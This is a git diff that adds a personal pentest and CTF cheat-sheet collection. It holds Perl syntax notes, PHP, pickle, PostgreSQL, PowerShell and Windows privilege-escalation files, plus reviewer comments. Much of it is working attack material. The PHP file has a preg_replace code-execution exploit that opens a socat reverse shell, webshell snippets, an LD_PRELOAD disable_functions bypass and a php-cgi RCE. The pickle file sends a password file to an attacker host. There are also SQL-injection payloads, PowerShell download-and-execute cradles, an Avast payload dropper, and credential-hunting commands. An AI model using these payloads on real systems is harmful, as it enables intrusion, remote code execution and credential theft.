+$t[3] = 4; # ajout d'un 4e element
+scalar(@t) # retourne le nombre d'éléments
+$x = @t; # idem $x contient la taille du tableau
+if (exists( $t[100])) # vaut faux si ya pas d'element à cet indice
+if (defined($t[100])) # vaut faux si l'element existe et vaut undef ou l'element n'existe pas
+$t[10] = "blah"; # tous les elements entre valent undef et scalar(@t) vaut 11
+
+@ARGV # ne contient que les arguments
+$0 # contient le nom du programme
+
+@t = @s; # copie de tableau, @t perd ses anciennes valeurs meme s'il était plus grand que @s
+($a,$b) = (1,2,3); => (1,2)
+($a,$b) = (1); => (1,undef)
+($a,$b) = ($b,$a);
+
+my ($a,$b); # declarer plusieurs variables comme en C avec: int a,b;
+
+foreach my $v (@t) { ... }
+foreach (@t) { print "$_\n"; }
+
+unshift(@t,5,6); # ajout en debut de tableau
+$v = shift(@t); # supprime et renvoie le 1er element
+push(@t,5,6); # ajout en fin de tableau
+$v = pop(@t); # supprimer et renvoie le dernier element
+@s = reverse(@t);
+
+@t = qw(un deux trois); # ou qw/un deux trois/;
+
+my ($arg1,$arg2) = @_; # 1ere ligne dans une fonction: recuperation des arguments
+my $x = shift; # dans une fonction, ça agit sur @_ par defaut
+return ($ret1,$ret2); # une fonction peut retourner une liste
+
+$s = join(", ", 1,2,3); # $s = "1, 2, 3";
+@t = split(/, /,"1, 2, 3"); # @t = (1,2,3);
+@t = (1,2,3); @s = split(/, /, join(", ",@t)); # @s = @t;
+
+@s = sort( {$a <=> $b or $a cmp $b} @t ); # '8 navets' < '12 carottes' < '12 navets'
+
+@s = grep { $_<0 } $x,@t; # @s reçoit les éléments négatifs
+@s = grep { mafonction($_ } @t;
+# NB. la liste sera modifiée si j'affecte une valeur à $_
+
+@s = map( {-$_ } @t); # reçoit les opposés
+map( { $_*=2 } @t); # tous les éléments de @t sont multipliés par 2
+# NB. la valeur de la dernière expression du bloc sera placée ans la liste résultat
+
+
+#
+# expressions rationnelles (pattern matching: correspondance de motif)
+#
+\ | ( ) [ ] { } ^ $ * + ? . # caractères spéciaux despécifier avec \
+
+# . matche tout sauf \n
+# matcher deux occurences d'un mot
+m/(\w+).*\1/
+
+# regroupement non mémorisant
+(?:motif)
+
+# en contexte scalaire m// retourne vrai ou faux
+if( $w =~ m/motif/ ) # on parle de correspondance
+
+# en contexte de liste m// retourne une liste
+if( ($x,$y) = ($v =~ m/^(foo).*(bar)$/) ) # on parle d'extraction
+
+# separateur
+la plupart des caractères sont utilisables, la lettre m n'est pas obligatoire si le séparateur est /
+
+# en correspondance, option g permet de poursuivre la recherche en partant du dernier motif trouvé
+my $v = "aatobbtbvvtczz";
+while ($v =~ m/t./g) { print "$&\n"; } => to tb tc
+
+# option e
+$s =~ s/(\d+)/fonction($1)/e;
+$s =~ s/0x[0-9a-f]+)/hex($1)/gei;
+
+# par defaut
+$s = "mot\nlu";
+$s =~ m/mot$/ est faux
+# options s (singleline)
+$s =~ m/mot$/s est faux
+$s =~ m/t.lu$/s est vrai
+# option m (multiline)
+$s =~ m/mot$/m est vrai
+$s =~ m/t.lu$/m est faux
+
+# quantificateurs non-groumands: ajouter ?
+@l = ($m =~ m/'.*?'/g) # retourne tous les mots entre ''
+
+# reference arriere
+m/(.*) (?:et )+(.*) avec \1 \2/ # references arrieres qui matchera 'ab et bc avec ab bc'
+
+# variables speciales
+$& # vaut toute la sous-chaîne matchant,
+$` # vaut toute la sous-chaîne qui précède la sous-chaîne matchant,
+$' # vaut toute la sous-chaîne qui suit la sous-chaîne matchant.
+
+
+# pour placer une variable utilisateur dans un motif ou un remplacement, il FAUT utiliser quotemeta()
+
+# tr
+$s = "azerty";
+$s =~ tr/abcde/01234/;
+print "$s\n"; # affiche 0z4rty
+
+
+#
+# fichiers
+#
+perldoc -f -X # operateurs
+if( -f $file && -w $file ) { ... }
+my $file_size = -s $file_path;
+
+@l = glob ('/usr/include/*.h');
+foreach my $name ( <.*>, <*> ) {
+ next if (! -d $name); print "$name : ". (-s $name) ."\n";
+}
+
+open(FIC, ">>data.txt") or die("open: $!"); # toujours tester si l'ouverture a reussi
+while () { print "$. : $_"; } # numerote chaque ligne du fichier
+
+while( defined( $line = ) )
+printf( FIC "%03d", $i ); # pas de virgule apres le descripteur
+close( FIC );
+
+$l = ; # en contexte scalaire, renvoie la prochaine ligne disponible
+@t = ; # en contexte de liste, renvoie la liste des toutes les lignes restantes
+
+# descripteurs ouverts au lancement du pg:
+STDIN, STDOUT, STDERR, ARGV
+ ou <> # les lignes lues sont celles des fichiers de la ligne de commande
+$ARGV contient le nom du fichier en cours de lecture
+
+$c = getc(FIC);
+$tailleLue = read(FIC, $tampon, $taillALire); # données placées dans $tampon
+sysopen, sysread, syswrite et close # bas niveau
+
+open(FIC1,"ls $ref |"); # FIC1 contient ce qu'a affiché la commande
+open(FIC2,"|mail robert"); # FIC2 contient le mail
+
+# fichiers DBM
+my %h;
+dbmopen(%h,"data",0644) or die($!);
+$h{'prenom'} = 'Larry';
+dbmclose(%h) or die($!);
+
+my %h;
+dbmopen(%h,"data",0644) or die($!);
+print "$h{'prenom'}\n";
+dbmclose(%h) or die($!);
+
+#
+# tables de hachage
+#
+my %h = ();
+my %h = ( "Paul" => "01.23.45.67.89",
+ "Virginie" => "06.06.06.06.06",
+ "Pierre" => "heu ..." );
+
+sub f { return "Jac"; }
+$h{f().'ques'} = "02.02.02.02.02";
+
+foreach my $k (keys(%h)) { print "Clef=$k Valeur=$h{$k}\n"; }
+foreach my $v (values(%h)) {...}
+while( my ($k,$v) = each(%h) ) {...}
+
+delete( $h{hello} ) if (exists($h{hello})); # attention $h{hello} = undef; ne supprime pas la clef
+
+if( %h eq 0 ) { print "%h est vide\n"; }
+
+$h{hello} .= "après";
+$h{bye}++; # crée un élément de valeur 1 si la table ne comportait pas de clef bye
+
+my @t = ("Paul", "01.23.45.67.89", "Virginie", "06.06.06.06.06", "Pierre", "heu ...");
+my %h = @t;
+# et retour à la case départ avec: my @t2 = %h;
+
+foreach my $x (%h) { print "$x\n"; } # affiche la table comme une liste
+%h = reverse(%h); # les valeurs deviennent les clefs
+
+%ENV # variable contenenant l'env
+
+$h{"$i:$j:$k"} = Calcul($i,$j,$k); # table de hash permettent d'avoir des tableaux à plusieurs dimensions
+
+
+#
+# tranches
+#
+@t[4,10] = (4321,"age"); # equivaut à: ($t[4],$t[10]) = (4321,"age");
+
+($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size,$atime,$mtime,$ctime,$blksize,$blocks) = stat($filename);
+($mtime,$ctime) = ( stat($filename) )[9,10];
+
+@h{'clef1','clef2'} # equivaut à: ($h{'clef1'},$h{'clef2'})
+
+# liste de valeurs uniques à partir d'un tableau dont on n'est pas sûr que ses valeurs soient uniques:
+my @t = qw(hello toto hello vous);
+my %h;
+@h{@t} = ();
+@t = keys %h;
+
+
+#
+# modules
+#
+$ perl -V # @INC: liste des répertoires où seront recherchés les modules.
+perldoc File::Copy
+perl -e 'use Net::SMTP' # verifier qu'un module est dispo sur le système
+
+#
+# references
+#
+
+# sur scalaire
+$v = -43.5;
+my $refv = \$v; # \$v est la référence de la variable $v
+print "$refv\n"; # affiche SCALAR(0x80ff4f0)
+print "$$refv\n"; # affiche -43.5
+$$refv = 56;
+print "$v\n"; # affiche 56
+
+# sur fonction
+f( \$v );
+sub f
+{
+ my ($ref) = @_;
+ $$ref = 0;
+}
+# et
+my $reff = f2();
+sub f2
+{
+ my $w = 43;
+ return \$w;
+}
+
+# sur tableau
+my @t = (23, "ab", -54.4);
+my $reft = \@t;
+my @t2 = @$reft;
+@$reft = (654.7, -9, "bonjour");
+$reft->[1] = "coucou"; # plus lisible que $$reft[1]
+my @t = ( 6, \@t1, \@t2, "s" ); # tableau de tableau, puis $t[2][1] ou avec une reference $r->[2]->[1]
+
+# sur table de hachage
+my $refh = \%h;
+my %h2 = %$refh;
+$refh->{Jacques} = 33;
+
+# sur fichiers
+my $refo = \*STDOUT;
+
+# sur fonctions
+my $ref = \&affcoucou;
+&$ref("Larry"); ou $ref->("Larry");
+
+# ajouter 1 à une reference ne vas pas faire pointer sur l'element d'indice +1 mais faire perdre le caractere reference à la variable
+
+# reference anonyme
+my $ref2 = \"er"; # mais $$ref2 = "blah"; lèvera une erreur
+my $r = [ 34.4, "ac", -71 ]; # vers tableau
+my $r = { 'Paul' => 21, 'Julie' => "e" };
+
+# operateur ref() permet de connaitre le type d'une reference
+# afficher la structure d'une variable
+use Data::Dumper;
+print Dumper($r);
+
+# reference circulaire
+c'est possible, mais attention le garbage-collector ne liberera pas la memoire si on ne casse pas la circularité:
+$r->[1] = undef;
+$r = undef;
+
+# cpan
+Config.pm: 'makepl_arg' => q[PREFIX=~/perl5lib/ LIB=~/perl5lib/lib INSTALLMAN1DIR=~/perl5lib/man1 INSTALLMAN3DIR=~/perl5lib/man3], # definir le repertoire dans lequel les modules seront installés
+export PERL5LIB=~/perl5lib/lib # ajoute le repertoire à mon @INC au runtime
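Review bot: The list of false scalar values at `- "0" ou 'O'` names the letter O, which is a true string in Perl; the intended line is `- "0" ou '0'`. Two regex examples also do not compile as written: `@s = grep { mafonction($_ } @t;` is missing its closing parenthesis, and `$s =~ s/0x[0-9a-f]+)/hex($1)/gei;` lacks the opening parenthesis of the capture group, so `$1` would never be set. The filehandle reads `while () { print "$. : $_"; }`, `while( defined( $line = ) )`, `$l = ;` and `@t = ;` have lost their angle-bracket operand (presumably `<FIC>`), most likely stripped during rendering, but worth checking in the committed file.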
diff --git a/Cheat Sheet/phishing b/Cheat Sheet/phishing
new file mode 100644
index 0000000..ce9cbae
--- /dev/null
+++ b/Cheat Sheet/phishing
@@ -0,0 +1,5 @@
+# phishing
+
+https://github.com/trailofbits/trailofphish
+http://d.uijn.nl/?p=116 # powershell unicorn
+http://papercut.codeplex.com/ # fake smtp server
diff --git a/Cheat Sheet/php b/Cheat Sheet/php
new file mode 100644
index 0000000..feebbbb
--- /dev/null
+++ b/Cheat Sheet/php
@@ -0,0 +1,210 @@
+# php
+
+# badass past vulns
+https://github.com/80vul/phpcodz
+
+# simple php standalone web server
+php -S localhost:8000 -t public_html/
+
+# operator == (type confusion)
+https://habnab.it/php-table.html
+http://gynvael.coldwind.pl/?id=492
+https://docs.google.com/spreadsheets/d/1oWsmTvEZcfgc_1QkBczNGA3Gcffg_pmgKcak7iZldUw/pub?output=html
+
+# magic hashes
+https://www.whitehatsec.com/blog/magic-hashes/
+https://md5db.net/explore/0E56
+https://github.com/spaze/hashes
+
+# integer key truncation
+https://www.sektioneins.de/blog/15-08-03-php_challenge_2015_solution.html
+bug: converting 4294967296 (0x100000000) to 32-bit is 0 so different arrays compare identical: ["4294967296 "=>"5" , "1"=>"mypw"] === ["0"=>"5","1"=>"mypw"] => true
+and also changing POST json ["1234","seb","oldpw","newpw"] to {"4294967296":"1234","1":"seb","2":"oldpw","3":"newpw"} will update pw of uid account 0
+because "update users set pw='${input[3]}' where uid='${input[0]}'") => update ... where uid='' (same as uid=0) because $input[0] => NULL (on unpatched php versions)
+
+# configuration audit hardening
+https://www.sektioneins.de/en/blog/14-08-21-php-secure-configuration-checker.html
+
+# determiner la version
+form.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
+form.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
+
+http://www.0php.com/php_easter_egg.php
+
+# see what modules are enabled
+php -m
+
+# opcache bypass write restrictions to webroot by overwrite cached index.php.bin
+http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/
+
+# preg_replace
+preg_replace($_GET["find"], $_GET["replace"], $unknown); exploit with find=//e&replace=`ls`
+
+preg_replace($_GET['ville'], $_GET['ville'], urldecode($_SERVER['REQUEST_URI']));
+curl 'http://10.0.0.1/demo/preg_replace.php?ville=`socat+exec:sh+tcp:10.10.220.211:8888`/e%00'
+curl 'http://10.0.0.1/demo/preg_replace.php?ville=print+2;%23/e%00'
+curl 'http://10.0.0.1/demo/preg_replace.php?ville=%23(.*)|%0aeval($_GET\[3\]);%23/e%00&3=system(%22id%22);'
+
+preg_replace('/' . $_GET['find'] . '/i', $_GET['replace'], $unknown) -> ?find=blah/e%00 PHP>=5.4.6 do not allow null byte in preg_replace anymore
+
+PHP since 7.0 doesn't allow code execution in preg_replace at all
+
+# unserialize RCEs
+http://vagosec.org/2013/09/wordpress-php-object-injection/
+http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/
+
+# unserialize / object injection 101
+http://securitycafe.ro/2015/01/05/understanding-php-object-injection/
+http://www.slideshare.net/_s_n_t/php-unserialization-vulnerabilities-what-are-we-missing
+https://websec.wordpress.com/2014/12/08/magento-1-9-0-1-poi/ (the guy who makes RIPS) and http://ebrietas0.blogspot.fr/2015/08/magento-bug-bounty-1-2-csrf-to-code.html
+
+# lulz
+PCRE_REPLACE_EVAL has been deprecated as of PHP 5.5.0
+NULL byte poisoning was fixed as of PHP 5.3.4
+
+# security best practice
+http://thisinterestsme.com/php-best-practises/
+http://stackoverflow.com/questions/3115559/exploitable-php-functions
+
+# static analysis
+http://rips-scanner.sourceforge.net/
+
+# pour ne pas renvoyer le X-Powered-By: PHP/5.2.9 dans les entetes HTTP
+expose_php = Off
+
+# magic quotes gpc (formation HSC)
+gpc=get post cookie
+
+application systematique de la fonction addslashes sur les var GET POST COOKIE
+magic_quotes_gpc ne fait rien d'autre que d'appeler addslashes (qui n'echape que ', ", NUL).
+ph34r les caractères multi-octets
+
+meme activé, sqli reste possible si
+- entier: WHERE id = $GET["id"]
+- app err: WHERE url = '".urldecode($GET["url"])
+
+C'est l'application qui doit valider les entrées.
++ is_int + intval, is_float ...
++ whitelist (in_array, regex)
++ mysql_real_escape_string
++ sql prepared statements (client-side ou server-side): plus besoin d'appeler mysql_real_escape et cie
+
+# (int) ou intval()
+intval fait au mieux eg. 123abc => 123
+vaut mieux faire is_int puis (int) sinon renvoyer 0
+
+# configuration secure
+display_errors = Off
+error_reporting = E_ALL
+log_error = On
+#error_log
+html_errors = Off
+register_globals = Off
+register_argc_argv
+variables_order = "GPCS"
+session.use_trans_sid = 0
+session.use_only_cookies = 1
+session.use_trans_sid = 0
+session.cookie_lifetime = 7200
+session.auto_start = 0
+session.cache_limiter = nocache
+session.cookie_httponly = 1
+session.bug_compat_42 = 0
+
+# filters
+
+
+# backdoors / webshells
+* htaccess
+
+order deny,allow
+allow from all
+
+AddType application/x-httpd-php .htaccess
+AddHandler x-httpd-php .htaccess
+php_flag engine on
+#
+
+* extract
+@extract($_REQUEST);
+@die($ctime($atime));
+http://...?ctime=system&atime=id
+
+* simple
+
+
+# build httpd + php with support for mysql, oci and mssql
+~/code/src/php-5-3.10 $ ./configure --prefix=/opt/m/php/php-5.3.10 --with-apxs2=/opt/m/httpd/httpd-2.4.1/bin/apxs --with-oci8=shared,/u01/app/oracle/product/11.2.0/xe --with-mysql=mysqlnd --with-mssql=/home/seb/code/src/freetds-0.91/opt/
+
+# php tricks
+# http://www.php.net/manual/en/ini.list.php
+# http://www.php.net/manual/en/configuration.changes.php
+print_r(ini_get_all());
+ini_set('display_errors', '1');
+
+* howto use pcntl_exec
+$args = array('-c', $_POST['c']);
+print_r($args); // next line would return HTTP 500 without this line (?!)
+pcntl_exec('/bin/bash', $args);
+
+* howto use proc-open
+https://github.com/p4-team/ctf/tree/master/2017-12-09-seccon-quals/web_automatic
+
+* bypass disable_functions by overwriting memory through the procfs - plaidctf-2014 nightmares
+http://www.reddit.com/r/netsec/comments/2tyh93/php_disable_functions_procfs_bypass_ru/
+
+* bypass disable_functions via putenv() LD_PRELOAD and mail(). Need to upload .so and .php (see 0ctf-2016 guestbook https://blog.ka0labs.net/post/33/ or alictf-2016 homework https://github.com/tothi/ctfs/tree/master/alictf-2016/homework)
+upload a.so:
+# compile with gcc -c -fPIC a.c -o a.o && gcc a.o -shared -o a.so
+#include
+#include
+#include
+int getuid ()
+{
+ char * en;
+ char * buf = malloc(300);
+ FILE * a;
+ unsetenv( "LD_PRELOAD");
+ a = fopen( "/tmp/cmd.txt", "r");
+ buf = fgets(buf, 100, a); // or buf = getenv("_evilcmd");
+ write(2, buf, strlen(buf)); // optional?
+ fclose(a);
+ remove("/tmp/cmd.txt");
+ rename("/var/www/a.so", "/var/www/b.so"); // shouldnt be required (we already unsetenv)
+ buf = strcat(buf, "> /tmp/out.txt");
+ system(buf);
+ rename( "/var/www/b.so", "/var/www/a.so");// shouldnt be required
+ free(buf);
+ return 0;
+}
+upload blah.php:
+
+
+* bypass __wakeup()
+https://bugs.php.net/bug.php?id=72663
+
+requests.get('http://127.0.0.1:1234/?data=' + quote('a:2:{i:0;O:6:"HITCON":3:{s:14:"\x00HITCON\x00method";s:4:"show";s:12:"\x00HITCON\x00args";a:1:{i:0;s:17:"orange\' sqli here";}s:12:"\x00HITCON\x00conn";47:{a:1:{i:0;O:9:"Exception":2:{s:7:"\x00*\x00file";R:4;}}i:1;R:4;}'))
+
+* bypasss verify hostname by parse_url https://bugs.php.net/bug.php?id=73192
+parse_url('http://example.com/#@google.com/')['host'] -> google.com
+
+* bypass parse_url
+parse_url('http://upload/?/path/to/blah') -> {'host': 'upload?', 'path': '/path/to/blah'}
+
+* bypass preg_match('/^.*information_schema.*$/is', arg)
+with arg = "' union select table_name from information_schema.tables#".str_repeat('a', 1000000);
+
+# php-cgi
+http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
+http://vuln.lol/path/?-s
+curl -v 'http://vuln.lol/path/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input' -d ''
+http://vuln.lol/cgi-bin/php/...
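Review bot: In the `# configuration secure` block, `log_error = On` is not a php.ini directive; the setting is `log_errors = On`, so as written nothing is logged while `display_errors = Off` hides errors from the browser, leaving no trace of failures at all. The same block lists `session.use_trans_sid = 0` twice, gives `register_argc_argv` no value, and includes `session.bug_compat_42`, which I believe was removed in PHP 5.4, so a note on the PHP version it targets would help. With `session.cookie_httponly = 1` already present, `session.cookie_secure = 1` is the natural companion for HTTPS-only deployments. The hunk header announces 210 lines but only 201 are shown, and the empty spots after `* simple`, `# filters` and `upload blah.php:` suggest lines containing `<?php … ?>` tags were stripped by the renderer rather than by the commit.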
diff --git a/Cheat Sheet/pickle b/Cheat Sheet/pickle
new file mode 100644
index 0000000..ffc50aa
--- /dev/null
+++ b/Cheat Sheet/pickle
@@ -0,0 +1,11 @@
+# pickle
+
+# rce
+curl -v http://localhost:9020 -d $'; job: cos\nsystem\n(S\x27cat /tmp/key>/tmp/weshbienjoue\x27\ntR.\x27\ntR.'
+// or
+class Job(object):
+ def __init__(self):
+ subprocess.Popen(['curl', 'http://attacker/', '-F', 'key=@/home/level06/.password'])
+
+payload = 'wesh; job: %s' % pickle.dumps(Job()) # we inject before so that the second job is ignored "type: JOB; data: ; job: ; job: "
+urllib.urlopen('http://localhost:9020/', data=payload)
diff --git a/Cheat Sheet/png b/Cheat Sheet/png
new file mode 100644
index 0000000..fe74cef
--- /dev/null
+++ b/Cheat Sheet/png
@@ -0,0 +1,10 @@
+# png
+
+# apt-get install pngcheck
+pngcheck -vt ctf.png
+
+# apt-get install pngtools
+pngchunks ctf.png
+
+# use pngsplit to extract every chunks
+
diff --git a/Cheat Sheet/postfix b/Cheat Sheet/postfix
new file mode 100644
index 0000000..28d3f07
--- /dev/null
+++ b/Cheat Sheet/postfix
@@ -0,0 +1,7 @@
+# postfix
+
+# afficher un mail dans la queue
+postcat -q ABCDEF1234
+
+# supprimer un mail de la queue
+postsuper -d ABCDEF1234
diff --git a/Cheat Sheet/postgres b/Cheat Sheet/postgres
new file mode 100644
index 0000000..7e064a0
--- /dev/null
+++ b/Cheat Sheet/postgres
@@ -0,0 +1,59 @@
+# postgres
+
+# SQLi-fu
+
+* fast exploitation in PosgreSQL >= 9.0 using string_agg function
+id=-1 union select null,string_agg(login||chr(58)||pass,chr(44)) from users;
+id | news
+---+---------------------------------------
+ | admin:P@ssw0rd,root:Qwerty1,test:test123
+(1 row)
+
+* error based
+select * from news where id=1 and (select box(login||chr(58)||pass) from users) is not null; # also works with: circle, ilne, lseg, path, point, polygon instead of box
+
+1=cast((select table_name from information_schema.tables limit 1 offset 0) as int) => invalid input syntax for integer: "pg_type"
+1=cast((select usename from pg_shadow limit 1 offset 0) as int)
+1=cast((select passwd from pg_shadow limit 1 offset 0) as int)
+
+* time based blind
+ProductID = 1;SELECT pg_sleep(25)--
+ProductID = 1);SELECT pg_sleep(25)--
+ProductID = 1';SELECT pg_sleep(25)--
+ProductID = 1');SELECT pg_sleep(25)--
+ProductID = 1));SELECT pg_sleep(25)--
+ProductID = 1'));SELECT pg_sleep(25)--
+ProductID = SELECT pg_sleep(25)--
+
+# usage
+* lister les databases
+psql -l -U postgres
+
+* pour se connecter depuis localhost, il faut soit etre dans le groupe postgres soit etre l'utilisateur postgres ou root
+psql -U postgres
+
+* creer une bdd "test"
+createdb -U postgres -W test
+
+* supprimer la bdd test
+dropdb -U postgres -W test
+
+* creer un superuser
+createuser -a -d -P -E -U postgres -W chris
+
+* creer un user standard
+createuser -A -D -P -E -U chris -W testuser
+
+* creer une bdd owned par testuser
+createdb -O testuser -U chris -W MyDB
+
+* se connecter
+psql -U testuser -W MyDB
+
+# ezpublish
+$ createuser -a -d -P -E -U postgres ezpublish_user
+Enter password for new role:
+Enter it again:
+
+$ createdb -O ezpublish_user -U postgres ezpublish_db
+
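Review bot: The statement under `# usage` that connecting from localhost requires membership of the postgres group, or being the postgres or root user, is not a PostgreSQL rule; local access is decided by the authentication method configured in `pg_hba.conf` (`peer` maps the OS user to a role of the same name, `trust` admits anyone, `md5`/`scram-sha-256` require a password), and root has no special standing unless a role or a `pg_ident.conf` mapping grants it. Rewording it to something like `depends on the local auth method in pg_hba.conf (peer on Debian-derived packages)` would stop readers from treating group membership as the control. The `-E` flag on the `createuser` lines only requests an encrypted password, which is already the default, so it can be dropped.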
diff --git a/Cheat Sheet/powershell b/Cheat Sheet/powershell
new file mode 100644
index 0000000..83400a8
--- /dev/null
+++ b/Cheat Sheet/powershell
@@ -0,0 +1,77 @@
+# powershell
+
+http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers
+
+http://code.google.com/p/nishang/
+https://github.com/mattifestation/PowerSploit and https://github.com/obscuresec/PowerSploit (contributor)
+
+https://github.com/darkoperator Posh-SecMod
+
+http://securitypadawan.blogspot.com.au/2013/07/authenticated-metasploit-payloads-via.html
+there also should be metasploit module also to fire up a reverse shell via powershell
+
+see ./bypass_av
+
+# AMSI / Windows 10
+http://www.labofapenetrationtester.com/2016/09/amsi.html
+
+# recon
+* obtain list of Windows XP
+Get-ADComputer -filter {OperatingSystem -like "*XP*"}
+
+# port scan
+http://webstersprodigy.net/2013/07/01/powershell-portscanner/
+
+# learn
+http://mohd-akram.github.io/2013/05/16/a-python-developers-guide-to-powershell
+
+get-command or gcm (alias) # list all cmdlets
+
+# PowerSploit
+Import-Module .\PowerSploit
+Get-Command -Module PowerSploit
+Get-Help Invoke-ReflectivePEInjection
+
+# Reflective DLL Injection
+premiere version par Stephen Fewer
+amelioration par Joe Bialek
+incorpore dans PowerSploit
+
+# basics
+PS c:\> $psversiontable # if nothing comes back it's powershell v1
+or just run: get-host # works on all versions
+
+# remote
+WinRM / PowerShell Remoting service port 47001
+WinRM 5985 (HTTP) and 5986 (HTTPS)
+
+# complete security audit of Windows host
+http://poshcode.org/639
+
+# bypass Execution Policy
+https://www.netspi.com/blog/entryid/238/15-ways-to-bypass-the-powershell-execution-policy
+
+random blog: Set-ExecutionPolicy Unrestricted -force'
+michele: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://172.16.37.1/XYZ/ps.png')); Invoke-CICCIO.
+
+Carnal0wnage (http://carnal0wnage.attackresearch.com/2015/03/powershell-ad-recon-by-pyrotek3.html)
+powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers"
+
+Sometimes I also base64-encode the "stager" and use EncodedCommand.
+
+Nice read about this: http://www.exploit-monday.com/2014/04/powerworm-analysis.html
+
+As a payload, I recently switched to this (as it's automatically compatible with x86 and also x86_64 without the need for you to do fingerprinting):
+https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
+
+# Executes PowerShell from an unmanaged process
+https://github.com/leechristensen/UnmanagedPowerShell/tree/master
+
+# metasploit powershell session
+https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/
+
+# LLMNR/NBT-NS poisoning
+https://github.com/Kevin-Robertson/Inveigh
+
+# http://expertmiami.blogspot.com.au/2015/07/the-avast-series.html
+avastBHO.SwitchToSafezone('\\..\\..\\..\\..\\..\\..\\Windows\\system32\\cmd.exe /c "cd %TEMP%&PowerShell (New-Object System.Net.WebClient).DownloadFile(\'http://192.168.233.1:8001/stage1.exe/',\'stage1.exe\');(New-Object -com Shell.Application).ShellExecute(\'stage1.exe\');"')
diff --git a/Cheat Sheet/privesc b/Cheat Sheet/privesc
new file mode 100644
index 0000000..906c4b4
--- /dev/null
+++ b/Cheat Sheet/privesc
@@ -0,0 +1,303 @@
+# privilege escalation privesc
+
+http://pwnwiki.io
+
+# windows
+https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit
+http://www.networkpentest.net/p/windows-command-list.html
+
+date /t & time /t
+net time \\computername
+
+whoami /all
+ver
+set
+systeminfo | findstr /r /c:"^Host Name" /c:"^OS Name:" /c:"^OS Version:" /c:"^System Type:"
+PS C:\> $PSVersionTable.BuildVersion
+
+fsutil fsinfo drives
+fsutil volume diskfree c: # or dir c:\
+
+netsh int ip show config
+netsh wlan export profile key=clear
+type %systemroot%\system32\drivers\etc\hosts
+ipconfig /displaydns # client dns cache
+nbtstat -c # netbios name cache
+
+netstat -anb
+netstat -a -n -p tcp | find "ESTAB"
+netstat -a -n -p tcp | find "LISTEN"
+netstat -a -n -p udp
+netstat -rn
+
+wmic computersystem get Name, domain, Manufacturer, Model, NumberofProcessors, PrimaryOwnerName,Username, Roles, totalphysicalmemory /format:list
+wmic process list full
+more at http://translate.wooyun.io/2015/10/10/WMI-Attacks.html
+
+net accounts /domain # pw policy for the domain
+
+net share # list of shares on the server
+net view \\computername # list of shares on a remote computer
+net session # list SMB sessions of users connected to the server
+net file # list of open shared files on the server
+
+reg query hklm\system\currentcontrolset\control\lsa # stores LM hashes
+nbtstat -A
+net config workstation or server # view the domain name of current machine
+reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History" /v DCName # view the name of the domain controller
+
+net view # list computers
+net computers # list computers
+net view /domain # list all domains available to the host
+net view /domain:otherdom
+net view /domain:dom # list hosts that exist on the domain
+net group "Domain Computers" /domain
+
+for /f %i in (hosts.txt) do @(net view \\%i >> shares.txt 2>nul) # list active shares
+index all avail shares with Recoll (docx, zip, etc.) (http://hackerforhire.com.au/post-exploitation-finding-passwords-in-haystacks/)
+
+qwinsta or query session /server:computername /counter # list RDP sessions
+reg query "[\\machine\]hklm\software\microsoft\windows nt\currentversion\profilelist" /s | findstr /i "profileimagepath" # view recent logons or even simpler: dir /od \users
+reg query "hklm\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount" # entry might not exist. creds are in hklm\security\cache
+
+reg.exe query HKU # list of users currently logged in
+reg.exe query HKUS-1-5-21-... then need to find a way to resolve sids on the cmdline
+reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f # enable remote desktop
+
+systeminfo # but doesnt list all KBs
+wmic qfe list # lists installed security patches
+wmic qfe get Caption,Description,HotFixID,InstalledOn
+reg save HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates updates.reg
+wusa /uninstall /kb: # uninstall patch
+msinfo32 (GUI) ou msinfo32 /report msinfo.txt (CLI) # used to be winmsd.exe
+
+wmic /node:ip /user:u /password:p product get name /value # list installed programs
+wmic /node:@ips.txt /user:u /password:p product where name="program" call uninstall /INTERACTIVE:OFF # uninstall program
+
+PsInfo # list of all hostfixes, uptime etc.
+PsSid
+
+powershell -Command Get-ChildItem -Recurse Cert: | findstr -i Superfish
+
+tasklist /svc
+tasklist /v /fo list
+taskkill /f /im "cmd.exe" # killall
+net start or sc query or sc queryex
+sc query state= all
+sc stop aZeI
+sc delete aZeI
+del /F c:\zbSJCelh.exe
+
+qprocess /server:computername *
+tasklist /v /s computername
+
+net statistics workstation # uptime
+task manager -> performance # uptime for windows 2008
+
+tree c:\ /f /a
+dir /od # ls -ltr
+
+dir /a /s *assw* # find interesting files
+findstr /i /s password * # find interesting strings in files
+dir c:\*vnc.ini /s /b
+dir c:\*ultravnc.ini /s /b
+dir c:\ /s /b | findstr /si *vnc.ini
+findstr /si password *.txt | *.xml | *.ini
+findstr /si pass *.txt | *.xml | *.ini
+reg query HKLM /f password /t REG_SZ /s
+reg query HKCU /f password /t REG_SZ /s
+reg query HKLM\SYSTEM\Current\ControlSet\Services\SNMP
+passhunt.exe -r "domain.(foo|bar)" -x c:\windows
+passhunt.exe -r "/user:" -x c:\windows
+panhunt.exe
+
+C:\unattend.xml / post/windows/gather/enum_unattend
+C:\sysprep.inf [clear]
+C:\sysprep\sysprep.xml
+%WINDIR%\Panther\Unattend
+msf auxiliary/dcerpc/windows_deployment_services
+
+https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
+msf exploit/windows/local/trusted_service_path # unquoted service exes
+msf exploit/windows/local/service_permissions
+msf exploit/windows/local/always_install_elevated
+
